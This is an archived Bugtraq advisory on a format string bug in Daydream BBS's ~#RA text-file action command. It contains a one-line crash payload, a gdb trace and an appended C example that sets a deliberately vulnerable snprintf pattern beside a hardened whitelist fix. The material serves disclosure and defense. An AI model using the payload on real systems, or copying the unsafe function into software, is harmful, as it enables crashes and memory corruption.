[23658] in bugtraq


Daydream BBS Format strings issue.

daemon@ATHENA.MIT.EDU (KF)
Mon Dec 31 00:30:21 2001

Message-ID: <3C2FADE7.3020802@snosoft.com>
Date: Sun, 30 Dec 2001 19:14:31 -0500
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq@security-focus.com
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

Daydream BBS recently underwent some security changes. Although the buffer overflow was fixed in the ~#RA command, I am not sure if a format strings issue was addressed. It's my understanding that the users of daydream have the option of adding "Action commands" ("~#RA" being one of them) into the text files that they post. If a user forms a specially crafted text file, uploads it to daydream and then views the message using the menu system, the issue could be exploited.


background info:

 ~#RA[FILE]|[max]|
        Show random textfile. Format for file is "/path/foobar%d.ext",
        where %d is a random number (1-[max]).

example:

echo "~#RA%s%s%s%s%s%s" > filetoupload.gfx. Then place this file on the server and view it via the menu system.


Simple test to prove existence:
[root@linuxppc bbs]# echo "~#RA%s%s%s%s%s%s" > display/iso/welcome.gfx



                   ·| All accounts deleted - login |·
                   :|           as NEW!            |:
                  .:|                              |:.
           . ....:::|      NEW / CHAT / LOGOFF     |:::.... .
                    `------------------------------'


Username: test
Password: ****

Program received signal SIGSEGV, Segmentation fault.
formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",
  flags=268615586) at typetext.c:594
594                                     *cm++ = *sr++;
(gdb) bt
#0  formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",
  flags=268615586) at typetext.c:594

(gdb) x/10s $r1
0x7fffd440:      "\177ÿÚ\220\020\001Öì%s%s%s%s%s%s\n"



-KF
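The bug class behind the report, as an added example that is not Daydream's code and not part of the original post: a reconstruction of how a ~#RA[FILE]|[max]| action argument can end up as the format string of a printf-style call, next to a hardened version that only ever substitutes the one %d the feature is documented to need. The parser (ra_parse), the default of max=1 when no |max| field is present, and all function names are assumptions made for this example; the real typetext.c parser may behave differently.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RA_PREFIX "~#RA"

/* Parse one line of an uploaded text file of the form "~#RA[FILE]|[max]|".
 * FILE runs up to the first '|' or end of line. If no [max] is given we
 * assume 1 (assumption for this example; the advisory's test line has no
 * '|' at all and still reached the printf-style call).
 * Returns 1 on success and fills file/max, 0 otherwise. */
int ra_parse(const char *line, char *file, size_t filesz, int *max)
{
    size_t plen = strlen(RA_PREFIX);
    if (strncmp(line, RA_PREFIX, plen) != 0) return 0;
    const char *p = line + plen;
    size_t n = strcspn(p, "|\r\n");          /* FILE ends at '|' or end of line */
    if (n == 0 || n >= filesz) return 0;
    memcpy(file, p, n);
    file[n] = '\0';
    *max = 1;
    if (p[n] == '|') {
        char *end;
        long m = strtol(p + n + 1, &end, 10);
        if (end == p + n + 1 || m < 1 || m > 1000000) return 0;
        *max = (int)m;
    }
    return 1;
}

/* VULNERABLE pattern: the uploader's bytes become the format string.
 * "~#RA%s%s%s%s%s%s" makes snprintf walk the stack for pointers, which
 * is the SIGSEGV in formatted_print above; "%n" would write memory.
 * Kept here only to show the shape of the bug; never call it on
 * untrusted input. */
void ra_expand_unsafe(char *out, size_t outsz, const char *file, int n)
{
    snprintf(out, outsz, file, n);           /* format comes from the message */
}

/* Hardening step 1: accept a template only if it contains exactly one
 * "%d" and no other conversion. "%%" is allowed as a literal percent. */
int ra_template_ok(const char *file)
{
    int d = 0;
    for (const char *p = file; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;             /* literal percent */
        if (*p == 'd') { d++; continue; }    /* the documented random number */
        return 0;                            /* %s, %n, %x, trailing %, ... */
    }
    return d == 1;
}

/* Hardening step 2: substitute the number by hand so printf never sees
 * the uploader's bytes as a format. Returns 1 on success, 0 on a bad
 * template or an output that would not fit. */
int ra_expand_safe(char *out, size_t outsz, const char *file, int n)
{
    if (!ra_template_ok(file)) return 0;
    size_t o = 0;
    for (const char *p = file; *p; p++) {
        if (*p == '%' && p[1] == '%') {
            p++;
            if (o + 1 >= outsz) return 0;
            out[o++] = '%';
        } else if (*p == '%' && p[1] == 'd') {
            p++;
            int w = snprintf(out + o, outsz - o, "%d", n);
            if (w < 0 || (size_t)w >= outsz - o) return 0;
            o += (size_t)w;
        } else {
            if (o + 1 >= outsz) return 0;
            out[o++] = *p;
        }
    }
    out[o] = '\0';
    return 1;
}

int main(void)
{
    /* Constructed sample lines: one legitimate action, one from the advisory. */
    const char *lines[] = { "~#RA/gfx/hello%d.gfx|5|", "~#RA%s%s%s%s%s%s\n" };
    char file[64], path[128];
    int max;
    for (size_t i = 0; i < 2; i++) {
        if (!ra_parse(lines[i], file, sizeof file, &max)) continue;
        if (ra_expand_safe(path, sizeof path, file, 1 + rand() % max))
            printf("ok:       %s\n", path);
        else
            printf("rejected: %s\n", file);
    }
    return 0;
}
```

The check is deliberately a whitelist (exactly one %d, optional %%) rather than a blacklist of %s and %n: positional (%1$s), length-modified (%hn) and width forms all fail the same test without having to be enumerated.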

